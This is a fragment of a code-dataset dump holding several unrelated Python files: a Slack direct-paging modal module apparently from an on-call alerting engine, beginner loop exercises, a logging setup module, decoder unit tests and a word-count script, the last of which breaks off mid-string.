self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"id\"],\n )\n\n\nclass OnPagingCheckAdditionalResponders(OnPagingOrgChange):\n \"\"\"Check/uncheck additional responders checkbox.\"\"\"\n\n\nclass OnPagingUserChange(scenario_step.ScenarioStep):\n \"\"\"Add selected to user to the list.\n\n It will perform a user availability check, pushing a new modal for additional confirmation if needed.\n \"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n private_metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n selected_organization = _get_selected_org_from_payload(\n payload, private_metadata[\"input_id_prefix\"], slack_team_identity, slack_user_identity\n )\n selected_user = _get_selected_user_from_payload(payload, private_metadata[\"input_id_prefix\"])\n if selected_user is None:\n return\n\n # check availability\n availability_warnings = check_user_availability(selected_user)\n if availability_warnings:\n # display warnings and require additional confirmation\n view = _display_availability_warnings(payload, availability_warnings, selected_organization, selected_user)\n self._slack_client.api_call(\n \"views.push\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n )\n else:\n # user is available to be paged\n error_msg = None\n try:\n updated_payload = add_or_update_item(payload, USERS_DATA_KEY, selected_user.pk, DEFAULT_POLICY)\n except ValueError:\n updated_payload = payload\n error_msg = \"Cannot add user, maximum responders exceeded\"\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload, error_msg=error_msg)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"id\"],\n )\n\n\nclass OnPagingItemActionChange(scenario_step.ScenarioStep):\n \"\"\"Reload form with updated user details.\"\"\"\n\n def _parse_action(self, payload):\n value = payload[\"actions\"][0][\"selected_option\"][\"value\"]\n return value.split(\"|\")\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload, policy=None):\n policy, key, user_pk = self._parse_action(payload)\n\n error_msg = None\n if policy == REMOVE_ACTION:\n updated_payload = remove_item(payload, key, user_pk)\n else:\n try:\n updated_payload = add_or_update_item(payload, key, user_pk, policy)\n except ValueError:\n updated_payload = payload\n error_msg = \"Cannot update policy, maximum responders exceeded\"\n\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload, error_msg=error_msg)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"id\"],\n )\n\n\nclass OnPagingConfirmUserChange(scenario_step.ScenarioStep):\n \"\"\"Confirm user selection despite not being available.\"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n\n # recreate original view state and metadata\n private_metadata = {\n \"channel_id\": metadata[\"channel_id\"],\n \"input_id_prefix\": metadata[\"input_id_prefix\"],\n \"submit_routing_uid\": metadata[\"submit_routing_uid\"],\n USERS_DATA_KEY: metadata[USERS_DATA_KEY],\n SCHEDULES_DATA_KEY: metadata[SCHEDULES_DATA_KEY],\n }\n previous_view_payload = {\n \"view\": {\n \"state\": metadata[\"state\"],\n \"private_metadata\": json.dumps(private_metadata),\n },\n }\n # add selected user\n selected_user = _get_selected_user_from_payload(previous_view_payload, private_metadata[\"input_id_prefix\"])\n error_msg = None\n try:\n updated_payload = add_or_update_item(\n previous_view_payload, USERS_DATA_KEY, selected_user.pk, DEFAULT_POLICY\n )\n except ValueError:\n updated_payload = payload\n error_msg = \"Cannot add user, maximum responders exceeded\"\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload, error_msg=error_msg)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"previous_view_id\"],\n )\n\n\nclass OnPagingScheduleChange(scenario_step.ScenarioStep):\n \"\"\"Add selected to user to the list.\n\n It will perform a user availability check, pushing a new modal for additional confirmation if needed.\n \"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload, action=None):\n private_metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n selected_schedule = _get_selected_schedule_from_payload(payload, private_metadata[\"input_id_prefix\"])\n if selected_schedule is None:\n return\n\n error_msg = None\n try:\n updated_payload = add_or_update_item(payload, SCHEDULES_DATA_KEY, selected_schedule.pk, DEFAULT_POLICY)\n except ValueError:\n updated_payload = payload\n error_msg = \"Cannot add schedule, maximum responders exceeded\"\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload, error_msg=error_msg)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n view_id=payload[\"view\"][\"id\"],\n )\n\n\n# slack view/blocks rendering helpers\n\nDIVIDER_BLOCK = {\"type\": \"divider\"}\n\n\ndef render_dialog(slack_user_identity, slack_team_identity, payload, initial=False, error_msg=None):\n private_metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n submit_routing_uid = private_metadata.get(\"submit_routing_uid\")\n\n # Get organizations available to user\n available_organizations = _get_available_organizations(slack_team_identity, slack_user_identity)\n\n if initial:\n # setup initial form\n new_input_id_prefix = _generate_input_id_prefix()\n new_private_metadata = private_metadata\n new_private_metadata[\"input_id_prefix\"] = new_input_id_prefix\n selected_organization = available_organizations.first()\n is_team_selected, selected_team = False, None\n is_additional_responders_checked = False\n else:\n # setup form using data/state\n old_input_id_prefix, new_input_id_prefix, new_private_metadata = _get_and_change_input_id_prefix_from_metadata(\n private_metadata\n )\n selected_organization = _get_selected_org_from_payload(\n payload, old_input_id_prefix, slack_team_identity, slack_user_identity\n )\n is_team_selected, selected_team = _get_selected_team_from_payload(payload, old_input_id_prefix)\n is_additional_responders_checked = _get_additional_responders_checked_from_payload(payload, old_input_id_prefix)\n\n # widgets\n team_select_blocks = _get_team_select_blocks(\n slack_user_identity, selected_organization, is_team_selected, selected_team, new_input_id_prefix\n )\n additional_responders_blocks = _get_additional_responders_blocks(\n payload, selected_organization, new_input_id_prefix, is_additional_responders_checked, error_msg\n )\n\n # Add title and message inputs\n blocks = [_get_title_input(payload), _get_message_input(payload)]\n\n # Add organization select if more than one organization available for user\n if len(available_organizations) > 1:\n organization_select = _get_organization_select(\n available_organizations, selected_organization, new_input_id_prefix\n )\n blocks.append(organization_select)\n\n # Add team select and additional responders blocks\n blocks += team_select_blocks\n blocks += additional_responders_blocks\n\n view = _get_form_view(submit_routing_uid, blocks, json.dumps(new_private_metadata))\n return view\n\n\ndef _get_form_view(routing_uid, blocks, private_metadata):\n view = {\n \"type\": \"modal\",\n \"callback_id\": routing_uid,\n \"title\": {\n \"type\": \"plain_text\",\n \"text\": \"Create Alert Group\",\n },\n \"close\": {\n \"type\": \"plain_text\",\n \"text\": \"Cancel\",\n \"emoji\": True,\n },\n \"submit\": {\n \"type\": \"plain_text\",\n \"text\": \"Create\",\n },\n \"blocks\": blocks,\n \"private_metadata\": private_metadata,\n }\n\n return view\n\n\ndef _get_organization_select(organizations, value, input_id_prefix):\n organizations_options = []\n initial_option_idx = 0\n for idx, org in enumerate(organizations):\n if org == value:\n initial_option_idx = idx\n organizations_options.append(\n {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": f\"{org.org_title}\",\n \"emoji\": True,\n },\n \"value\": f\"{org.pk}\",\n }\n )\n\n organization_select = {\n \"type\": \"input\",\n \"block_id\": input_id_prefix + DIRECT_PAGING_ORG_SELECT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Organization\",\n },\n \"element\": {\n \"type\": \"static_select\",\n \"placeholder\": {\"type\": \"plain_text\", \"text\": \"Organization\", \"emoji\": True},\n \"options\": organizations_options,\n \"action_id\": OnPagingOrgChange.routing_uid(),\n \"initial_option\": organizations_options[initial_option_idx],\n },\n \"dispatch_action\": True,\n }\n\n return organization_select\n\n\ndef _get_select_field_value(payload, prefix_id, routing_uid, field_id):\n try:\n field = payload[\"view\"][\"state\"][\"values\"][prefix_id + field_id][routing_uid][\"selected_option\"]\n except KeyError:\n return None\n\n if field:\n return field[\"value\"]\n\n\ndef _get_selected_org_from_payload(payload, input_id_prefix, slack_team_identity, slack_user_identity):\n Organization = apps.get_model(\"user_management\", \"Organization\")\n selected_org_id = _get_select_field_value(\n payload, input_id_prefix, OnPagingOrgChange.routing_uid(), DIRECT_PAGING_ORG_SELECT_ID\n )\n if selected_org_id is None:\n return _get_available_organizations(slack_team_identity, slack_user_identity).first()\n else:\n org = Organization.objects.filter(pk=selected_org_id).first()\n return org\n\n\ndef _get_team_select_blocks(slack_user_identity, organization, is_selected, value, input_id_prefix):\n user = slack_user_identity.get_user(organization) # TODO: handle None\n teams = user.available_teams\n\n team_options = []\n # Adding pseudo option for default team\n initial_option_idx = 0\n team_options.append(\n {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": f\"No team\",\n \"emoji\": True,\n },\n \"value\": DEFAULT_TEAM_VALUE,\n }\n )\n for idx, team in enumerate(teams, start=1):\n if team == value:\n initial_option_idx = idx\n team_options.append(\n {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": f\"{team.name}\",\n \"emoji\": True,\n },\n \"value\": f\"{team.pk}\",\n }\n )\n\n team_select = {\n \"type\": \"input\",\n \"block_id\": input_id_prefix + DIRECT_PAGING_TEAM_SELECT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Team to notify\",\n },\n \"element\": {\n \"type\": \"static_select\",\n \"action_id\": OnPagingTeamChange.routing_uid(),\n \"placeholder\": {\"type\": \"plain_text\", \"text\": \"Select team\", \"emoji\": True},\n \"options\": team_options,\n },\n \"dispatch_action\": True,\n }\n\n # No context block if no team selected\n if not is_selected:\n return [team_select]\n\n team_select[\"element\"][\"initial_option\"] = team_options[initial_option_idx]\n return [team_select, _get_team_select_context(organization, value)]\n\n\ndef _get_team_select_context(organization, team):\n team_name = team.name if team else \"No team\"\n alert_receive_channel = AlertReceiveChannel.objects.filter(\n organization=organization,\n team=team,\n integration=AlertReceiveChannel.INTEGRATION_DIRECT_PAGING,\n ).first()\n\n escalation_chains_exist = EscalationChain.objects.filter(\n channel_filters__alert_receive_channel=alert_receive_channel\n ).exists()\n\n if not alert_receive_channel:\n context_text = (\n \":warning: *Direct paging integration missing*\\n\"\n \"The selected team doesn't have a direct paging integration configured and will not be notified. \"\n \"If you proceed with the alert group, an empty direct paging integration will be created automatically for the team. \"\n \"\"\n )\n elif not escalation_chains_exist:\n context_text = (\n \":warning: *Direct paging integration not configured*\\n\"\n \"The direct paging integration for the selected team has no escalation chains configured. \"\n \"If you proceed with the alert group, the team likely will not be notified. \"\n \"\"\n )\n else:\n context_text = f\"Integration <{alert_receive_channel.web_link}|{alert_receive_channel.verbal_name} ({team_name})> will be used for notification.\"\n\n context = {\n \"type\": \"context\",\n \"elements\": [\n {\n \"type\": \"mrkdwn\",\n \"text\": context_text,\n }\n ],\n }\n return context\n\n\ndef _get_additional_responders_blocks(\n payload, organization, input_id_prefix, is_additional_responders_checked, error_msg\n):\n checkbox_option = {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": \"Notify additional responders\",\n },\n }\n\n blocks = [\n {\n \"type\": \"input\",\n \"block_id\": input_id_prefix + DIRECT_PAGING_ADDITIONAL_RESPONDERS_INPUT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Additional responders\",\n },\n \"element\": {\n \"type\": \"checkboxes\",\n \"options\": [checkbox_option],\n \"action_id\": OnPagingCheckAdditionalResponders.routing_uid(),\n },\n \"optional\": True,\n \"dispatch_action\": True,\n }\n ]\n\n if is_additional_responders_checked:\n blocks[0][\"element\"][\"initial_options\"] = [checkbox_option]\n\n if error_msg:\n blocks += [\n {\n \"type\": \"section\",\n \"block_id\": \"error_message\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\":warning: {error_msg}\",\n },\n }\n ]\n\n if is_additional_responders_checked:\n users_select = _get_users_select(organization, input_id_prefix)\n schedules_select = _get_schedules_select(organization, input_id_prefix)\n\n blocks += [users_select, schedules_select]\n # selected items\n selected_users = get_current_items(payload, USERS_DATA_KEY, organization.users)\n selected_schedules = get_current_items(payload, SCHEDULES_DATA_KEY, organization.oncall_schedules)\n\n if selected_users or selected_schedules:\n blocks += [DIVIDER_BLOCK]\n blocks += _get_selected_entries_list(input_id_prefix, USERS_DATA_KEY, selected_users)\n blocks += _get_selected_entries_list(input_id_prefix, SCHEDULES_DATA_KEY, selected_schedules)\n blocks += [DIVIDER_BLOCK]\n\n return blocks\n\n\ndef _get_users_select(organization, input_id_prefix):\n users = organization.users.all()\n\n user_options = [\n {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": f\"{user.name or user.username}\",\n \"emoji\": True,\n },\n \"value\": f\"{user.pk}\",\n }\n for user in users\n ]\n\n if not user_options:\n return {\"type\": \"context\", \"elements\": [{\"type\": \"mrkdwn\", \"text\": \"No users available\"}]}\n\n user_select = {\n \"type\": \"section\",\n \"text\": {\"type\": \"mrkdwn\", \"text\": \"Add users\"},\n \"block_id\": input_id_prefix + DIRECT_PAGING_USER_SELECT_ID,\n \"accessory\": {\n \"type\": \"static_select\",\n \"placeholder\": {\"type\": \"plain_text\", \"text\": \"Select a user\", \"emoji\": True},\n \"action_id\": OnPagingUserChange.routing_uid(),\n },\n }\n MAX_STATIC_SELECT_OPTIONS = 100\n if len(user_options) > MAX_STATIC_SELECT_OPTIONS:\n # paginate user options in groups\n max_length = MAX_STATIC_SELECT_OPTIONS\n chunks = [user_options[x : x + max_length] for x in range(0, len(user_options), max_length)]\n option_groups = [\n {\n \"label\": {\"type\": \"plain_text\", \"text\": f\"({(i * max_length)+1}-{(i * max_length)+max_length})\"},\n \"options\": group,\n }\n for i, group in enumerate(chunks)\n ]\n user_select[\"accessory\"][\"option_groups\"] = option_groups\n\n else:\n user_select[\"accessory\"][\"options\"] = user_options\n\n return user_select\n\n\ndef _get_schedules_select(organization, input_id_prefix):\n schedules = organization.oncall_schedules.all()\n\n schedule_options = [\n {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": f\"{schedule.name}\",\n \"emoji\": True,\n },\n \"value\": f\"{schedule.pk}\",\n }\n for schedule in schedules\n ]\n if not schedule_options:\n schedule_select = {\"type\": \"context\", \"elements\": [{\"type\": \"mrkdwn\", \"text\": \"No schedules available\"}]}\n else:\n schedule_select = {\n \"type\": \"section\",\n \"text\": {\"type\": \"mrkdwn\", \"text\": \"Add schedules\"},\n \"block_id\": input_id_prefix + DIRECT_PAGING_SCHEDULE_SELECT_ID,\n \"accessory\": {\n \"type\": \"static_select\",\n \"placeholder\": {\"type\": \"plain_text\", \"text\": \"Select a schedule\", \"emoji\": True},\n \"options\": schedule_options,\n \"action_id\": OnPagingScheduleChange.routing_uid(),\n },\n }\n return schedule_select\n\n\ndef _get_selected_entries_list(input_id_prefix, key, entries):\n current_entries = []\n for entry, policy in entries:\n if key == USERS_DATA_KEY:\n icon = \":bust_in_silhouette:\"\n name = entry.name or entry.username\n extra = entry.timezone\n else:\n # schedule\n icon = \":spiral_calendar_pad:\"\n name = entry.name\n extra = None\n current_entries.append(\n {\n \"type\": \"section\",\n \"block_id\": input_id_prefix + f\"{key}_{entry.pk}\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"{icon} *{name}* | {policy} notifications\" + (f\"\\n_({extra})_\" if extra else \"\"),\n },\n \"accessory\": {\n \"type\": \"overflow\",\n \"options\": [\n {\"text\": {\"type\": \"plain_text\", \"text\": f\"{label}\"}, \"value\": f\"{action}|{key}|{entry.pk}\"}\n for (action, label) in ITEM_ACTIONS\n ],\n \"action_id\": OnPagingItemActionChange.routing_uid(),\n },\n }\n )\n return current_entries\n\n\ndef _display_availability_warnings(payload, warnings, organization, user):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n\n messages = []\n for w in warnings:\n if w[\"error\"] == USER_IS_NOT_ON_CALL:\n messages.append(\n f\":warning: User *{user.name or user.username}* is not on-call.\\nWe recommend you to select on-call users first.\"\n )\n schedules_available = w[\"data\"].get(\"schedules\", {})\n if schedules_available:\n messages.append(\":information_source: Currently on-call from schedules:\")\n for schedule, users in schedules_available.items():\n oncall_users = organization.users.filter(public_primary_key__in=users)\n usernames = \", \".join(f\"*{u.name or u.username}*\" for u in oncall_users)\n messages.append(f\":spiral_calendar_pad: {schedule}: {usernames}\")\n elif w[\"error\"] == USER_HAS_NO_NOTIFICATION_POLICY:\n messages.append(f\":warning: User *{user.name or user.username}* has no notification policy setup.\")\n\n return {\n \"type\": \"modal\",\n \"callback_id\": OnPagingConfirmUserChange.routing_uid(),\n \"title\": {\"type\": \"plain_text\", \"text\": \"Are you sure?\"},\n \"submit\": {\"type\": \"plain_text\", \"text\": \"Confirm\"},\n \"blocks\": [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": message,\n },\n }\n for message in messages\n ],\n \"private_metadata\": json.dumps(\n {\n \"state\": payload[\"view\"][\"state\"],\n \"input_id_prefix\": metadata[\"input_id_prefix\"],\n \"channel_id\": metadata[\"channel_id\"],\n \"submit_routing_uid\": metadata[\"submit_routing_uid\"],\n USERS_DATA_KEY: metadata[USERS_DATA_KEY],\n SCHEDULES_DATA_KEY: metadata[SCHEDULES_DATA_KEY],\n }\n ),\n }\n\n\ndef _get_selected_team_from_payload(payload, input_id_prefix):\n Team = apps.get_model(\"user_management\", \"Team\")\n selected_team_id = _get_select_field_value(\n payload, input_id_prefix, OnPagingTeamChange.routing_uid(), DIRECT_PAGING_TEAM_SELECT_ID\n )\n\n if selected_team_id is None:\n return None, None\n\n if selected_team_id == DEFAULT_TEAM_VALUE:\n return selected_team_id, None\n\n team = Team.objects.filter(pk=selected_team_id).first()\n return selected_team_id, team\n\n\ndef _get_additional_responders_checked_from_payload(payload, input_id_prefix):\n try:\n selected_options = payload[\"view\"][\"state\"][\"values\"][\n input_id_prefix + DIRECT_PAGING_ADDITIONAL_RESPONDERS_INPUT_ID\n ][OnPagingCheckAdditionalResponders.routing_uid()][\"selected_options\"]\n except KeyError:\n return False\n\n return len(selected_options) > 0\n\n\ndef _get_selected_user_from_payload(payload, input_id_prefix):\n User = apps.get_model(\"user_management\", \"User\")\n selected_user_id = _get_select_field_value(\n payload, input_id_prefix, OnPagingUserChange.routing_uid(), DIRECT_PAGING_USER_SELECT_ID\n )\n if selected_user_id is not None:\n user = User.objects.filter(pk=selected_user_id).first()\n return user\n\n\ndef _get_selected_schedule_from_payload(payload, input_id_prefix):\n OnCallSchedule = apps.get_model(\"schedules\", \"OnCallSchedule\")\n selected_schedule_id = _get_select_field_value(\n payload, input_id_prefix, OnPagingScheduleChange.routing_uid(), DIRECT_PAGING_SCHEDULE_SELECT_ID\n )\n if selected_schedule_id is not None:\n schedule = OnCallSchedule.objects.filter(pk=selected_schedule_id).first()\n return schedule\n\n\ndef _get_and_change_input_id_prefix_from_metadata(metadata):\n old_input_id_prefix = metadata[\"input_id_prefix\"]\n new_input_id_prefix = _generate_input_id_prefix()\n metadata[\"input_id_prefix\"] = new_input_id_prefix\n return old_input_id_prefix, new_input_id_prefix, metadata\n\n\ndef _get_title_input(payload):\n title_input_block = {\n \"type\": \"input\",\n \"block_id\": DIRECT_PAGING_TITLE_INPUT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Title\",\n },\n \"element\": {\n \"type\": \"plain_text_input\",\n \"action_id\": FinishDirectPaging.routing_uid(),\n \"placeholder\": {\n \"type\": \"plain_text\",\n \"text\": \" \",\n },\n },\n }\n if payload.get(\"text\", None) is not None:\n title_input_block[\"element\"][\"initial_value\"] = payload[\"text\"]\n return title_input_block\n\n\ndef _get_title_from_payload(payload):\n title = payload[\"view\"][\"state\"][\"values\"][DIRECT_PAGING_TITLE_INPUT_ID][FinishDirectPaging.routing_uid()][\"value\"]\n return title\n\n\ndef _get_message_input(payload):\n message_input_block = {\n \"type\": \"input\",\n \"block_id\": DIRECT_PAGING_MESSAGE_INPUT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Message\",\n },\n \"element\": {\n \"type\": \"plain_text_input\",\n \"action_id\": FinishDirectPaging.routing_uid(),\n \"multiline\": True,\n \"placeholder\": {\n \"type\": \"plain_text\",\n \"text\": \" \",\n },\n },\n \"optional\": True,\n }\n if payload.get(\"message\", {}).get(\"text\") is not None:\n message_input_block[\"element\"][\"initial_value\"] = payload[\"message\"][\"text\"]\n return message_input_block\n\n\ndef _get_message_from_payload(payload):\n message = (\n payload[\"view\"][\"state\"][\"values\"][DIRECT_PAGING_MESSAGE_INPUT_ID][FinishDirectPaging.routing_uid()][\"value\"]\n or \"\"\n )\n return message\n\n\ndef _get_available_organizations(slack_team_identity, slack_user_identity):\n return (\n slack_team_identity.organizations.filter(users__slack_user_identity=slack_user_identity)\n .order_by(\"pk\")\n .distinct()\n )\n\n\n# _generate_input_id_prefix returns uniq str to not to preserve input's values between view update\n# https://api.slack.com/methods/views.update#markdown\ndef _generate_input_id_prefix():\n return str(uuid4())\n\n\nSTEPS_ROUTING = [\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_STATIC_SELECT,\n \"block_action_id\": OnPagingOrgChange.routing_uid(),\n \"step\": OnPagingOrgChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_STATIC_SELECT,\n \"block_action_id\": OnPagingTeamChange.routing_uid(),\n \"step\": OnPagingTeamChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_CHECKBOXES,\n \"block_action_id\": OnPagingCheckAdditionalResponders.routing_uid(),\n \"step\": OnPagingCheckAdditionalResponders,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_STATIC_SELECT,\n \"block_action_id\": OnPagingUserChange.routing_uid(),\n \"step\": OnPagingUserChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_VIEW_SUBMISSION,\n \"view_callback_id\": OnPagingConfirmUserChange.routing_uid(),\n \"step\": OnPagingConfirmUserChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_STATIC_SELECT,\n \"block_action_id\": OnPagingScheduleChange.routing_uid(),\n \"step\": OnPagingScheduleChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_OVERFLOW,\n \"block_action_id\": OnPagingItemActionChange.routing_uid(),\n \"step\": OnPagingItemActionChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_SLASH_COMMAND,\n \"command_name\": StartDirectPaging.command_name,\n \"step\": StartDirectPaging,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_VIEW_SUBMISSION,\n \"view_callback_id\": FinishDirectPaging.routing_uid(),\n \"step\": FinishDirectPaging,\n },\n]\n","repo_name":"shantanualsi/oncall","sub_path":"engine/apps/slack/scenarios/paging.py","file_name":"paging.py","file_ext":"py","file_size_in_byte":35564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"11805818507","text":"unconfirmed_users = ['alice', 'brian', 'candace']\nconfirmed_users = []\n\nwhile unconfirmed_users:\n current_users = unconfirmed_users.pop()\n\n print(f\"Verifying user: {current_users.title()}\")\n confirmed_users.append(current_users)\n\nprint(\"\\nThe following users have been confirmed:\")\nfor confirmed_user in confirmed_users:\n print(confirmed_user.title())\n\n#pets.py \npets = ['dog', 'cat', 'dog', 'goldfish', 'cat', 'rabbit', 'cat']\nprint(pets)\n\nwhile 'cat' in pets:\n pets.remove('cat')\n\nprint(pets)\n\n#mountain_poll.py\n\nresponses = {}\n\npolling_activate = True\n\nwhile polling_activate:\n name = input(\"\\nWhat is your name?\")\n response = input(\"Which mountain would you like to climb someday?\")\n\n responses[name] = response\n\n repeat = input(\"Would you like to let another person respond?(yes/no)\")\n if repeat == 'no':\n polling_activate = False\n\nprint(\"\\n---Poll Results---\")\nfor name, response in responses.items():\n print(f\"{name} would like to climb {response}.\")\n","repo_name":"jermartinz/Practice","sub_path":"Python-Crash-Course-Book/Ch7/confirmed_users.py","file_name":"confirmed_users.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16491381559","text":"#Logging implementation\n# this is the custom login\n\n#installing operating system and logging\nimport os\nimport sys\nimport logging\n\nlogging_str = \"[%(asctime)s: %(levelname)s: %(module)s: %(message)s]\" #initialize logging stream by saving ASCII timestamp and then save log level (info level log or bug log) then module , which module is running and then message we want to print\n\nlog_dir = \"logs\" # first a log directory is created\nlog_filepath = os.path.join(log_dir,\"running_logs.log\") # inside that running log directory is created\nos.makedirs(log_dir, exist_ok=True)\n\n\nlogging.basicConfig(\n level= logging.INFO,\n format= logging_str,\n\n handlers=[\n logging.FileHandler(log_filepath), # File handler will create teh log folder and save all the logging information\n logging.StreamHandler(sys.stdout) # Stream handler will print the log in the terminal\n ]\n)\n\nlogger = logging.getLogger(\"mlProjectLogger\") # finally initialize logger here\n","repo_name":"Pan2707/End-to-end-ML-project-with-ML-flow","sub_path":"src/mlProject/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8179886813","text":"import pytest\nimport math\nimport tensorflow as tf\nimport numpy as np\nfrom numpy.testing import assert_almost_equal\n\nfrom gtd.utils import Bunch\nfrom strongsup.example import Context\nfrom strongsup.decoder import Decoder, DecoderConfig\nfrom strongsup.predicate import Predicate\nfrom strongsup.utils import EOS\nfrom strongsup.tests.utils import PredicateGenerator, softmax\n\n\nclass DummyParseModel(object):\n def __init__(self, logits):\n self.logits = logits\n\n def score(self, cases):\n for case in cases:\n case.choice_logits = self.logits[:len(case.choices)]\n case.choice_probs = softmax(self.logits[:len(case.choices)])\n\n\nclass DummyExecutor(object):\n\n def execute(self, y_toks, old_denotation=None):\n new_denotation = (old_denotation or []) + [x.name for x in y_toks]\n # Let's disallow some sequences\n if new_denotation == ['a', 'c']:\n raise ValueError\n return new_denotation\n\n\nclass DummyContext(Context):\n def __init__(self):\n self._table_path = None\n self._utterance = None\n self._executor = DummyExecutor()\n self._predicates = None\n\n @property\n def predicates(self):\n return self._predicates\n\n\nclass TestSimpleDecode(object):\n @pytest.fixture\n def context(self):\n context = DummyContext()\n p = PredicateGenerator(context)\n context._predicates = [p('a'), p('b'), p('c'), p(EOS)]\n return context\n\n @pytest.fixture\n def parse_model(self):\n return DummyParseModel([0, math.log(2), math.log(4), math.log(3)])\n\n @pytest.fixture\n def config(self):\n return DecoderConfig(10, 3)\n\n @pytest.fixture\n def decoder(self, parse_model, config):\n caching = False\n return Decoder(parse_model, None, None, caching, config)\n\n def test_initial_beam(self, decoder, context):\n beam = decoder.initial_beam(context)\n assert len(beam) == 1\n assert len(beam[0]) == 0\n assert beam[0].context == context\n\n def test_advance(self, decoder, context):\n beam = decoder.initial_beam(context)\n new_beams = decoder.advance([beam])\n assert len(new_beams) == 1\n new_beam = new_beams[0]\n assert len(new_beam) == 4\n ranked = [' '.join([y.name for y in x.decisions]) for x in new_beam]\n assert ranked == ['c', EOS, 'b', 'a']\n\n def test_advance_twice(self, config, context):\n logits = [math.log(1), math.log(2), math.log(4), math.log(3)]\n parse_model = DummyParseModel(logits)\n caching = False\n decoder = Decoder(parse_model, None, None, caching, config)\n beam = decoder.initial_beam(context)\n new_beams = decoder.advance([beam])\n parse_model.logits = [math.log(5), math.log(2), math.log(7), math.log(6)]\n new_beams = decoder.advance(new_beams)\n assert len(new_beams) == 1\n new_beam = new_beams[0]\n assert len(new_beam) == 10\n ranked = [' '.join([y.name for y in x.decisions]) for x in new_beam]\n assert ranked == [\n EOS, 'c c', 'c ' + EOS, 'c a', 'b c',\n 'b ' + EOS, 'b a', 'c b', 'a ' + EOS, 'a a']\n\n def test_normalized_path_probs(self):\n beam = [Bunch(prob=0.01), Bunch(prob=0.5), Bunch(prob=0.2)]\n assert_almost_equal(Decoder._normalized_path_probs(beam), [1./71, 50./71, 20./71], decimal=5)\n\n # TODO Test predictions and train_step\n","repo_name":"microsoft/ContextualSP","sub_path":"lemon/executor/strongsup/tests/test_decoder.py","file_name":"test_decoder.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"} +{"seq_id":"21303173035","text":"##CARTELLA==operazioni_stringhe\ndef word_count(str):\n counts = dict()\n words = str.split()\n\n for word in words:\n if word in counts:\n counts[word] += 1\n else:\n counts[word] = 1\n\n return counts\n\nprint( word_count('the quick brown fox jumps over the lazy dog.'))\ndef word_count1(str):\n\tcounts =0\n\twords = str.split()\n\twords1= set(words)\n\tfor w1 in words1:\n\t\tcounts=0\n\t\tfor w in words:\n\t\t\tif w1==w:\n\t\t\t\tcounts=counts+1\n\t\t\t\t# ~ c1=str(counts)\n # ~ if word in counts:\n # ~ counts[word] += 1\n # ~ else:\n\t\tprint(w1,\" \",counts) # ~ counts[wored] = 1\n\t\t# ~ print(counts)\n\t\t# ~ return w + c1\nprint( word_count1('brown brown the quick brown fox jumps over the lazy 